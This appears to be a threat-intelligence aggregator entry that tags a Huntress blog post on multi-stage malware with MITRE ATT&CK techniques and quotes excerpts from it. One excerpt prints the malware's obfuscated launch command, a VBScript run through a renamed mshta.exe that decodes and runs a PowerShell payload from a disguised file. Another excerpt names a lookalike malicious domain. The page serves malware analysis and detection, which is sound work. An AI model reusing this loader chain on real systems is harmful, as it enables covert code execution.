TTPwire Vol. 1 · MITRE ATT&CK·Tagged

Huntress

Hiding in Plain Sight: Part 2

2020-08-20

ATT&CK techniques detected

5 predictions
T1059.001 PowerShell · 99%
"##32\bfeonservice.exe vbscript:createobject("wscript.shell").run("cmd.exe /c c:\windows\system32\engine.exe -c ""iex $($(gc 'c:\windows\a.chk' | % {[char][int]($_.split('x')[-1])}) -join '')""", 0…"

T1059.001 PowerShell · 84%
"Hiding in Plain Sight: Part 2. We recently uncovered a really peculiar piece of malware, which we've jokingly referred to as "the gift that keeps on giving." And the more we dug into it, the more we found to uncover and unpack. I consider this a "multi-stager, multi-payl…"

T1059.001 PowerShell · 69%
"0, true) (window.close)" The malware seemed to use a certain scheme — the doppelganger for the legitimate mshta.exe application (described in Part One of this blog series) is always renamed to a real, currently-active service on the target system. The second program tha…"

T1572 Protocol Tunneling · 65%
"&type=txt Do you see that dmarc.jqueryupdatejs.com? Anyone who might be familiar with JavaScript or the jQuery library might recognize this language, but even someone without that knowledge might pick up on the fact that jqueryupdatejs.com looks a bit suspicious. This secon…"

T1053.005 Scheduled Task · 39%
"Hiding in Plain Sight: Part 2. We recently uncovered a really peculiar piece of malware, which we've jokingly referred to as "the gift that keeps on giving." And the more we dug into it, the more we found to uncover and unpack. I consider this a "multi-stager, multi-payl…"

Summary

As a follow-up to our previous post, we recently uncovered a really peculiar piece of malware that works through a lot of different layers of abstraction.